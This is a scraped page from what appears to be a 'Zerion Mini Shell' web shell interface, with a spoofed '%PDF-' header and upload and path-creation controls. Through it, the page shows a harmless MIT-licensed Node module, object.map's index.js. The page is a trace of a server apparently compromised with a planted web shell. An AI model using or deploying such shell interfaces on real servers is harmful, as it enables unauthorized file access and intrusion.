%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/lib/node_modules/gulp-cli/node_modules/object.map/
Upload File :
Create Path :
Current File : //usr/local/lib/node_modules/gulp-cli/node_modules/object.map/index.js

/*!
 * object.map <https://github.com/jonschlinkert/object.map>
 *
 * Copyright (c) 2014-2017, Jon Schlinkert.
 * Released under the MIT License.
 */

'use strict';

var makeIterator = require('make-iterator');
var forOwn = require('for-own');

module.exports = function(obj, fn, thisArg) {
  var iterator = makeIterator(fn, thisArg);
  var result = {};

  forOwn(obj, function(value, key, orig) {
    result[key] = iterator(value, key, orig);
  });

  return result;
};

Zerion Mini Shell 1.0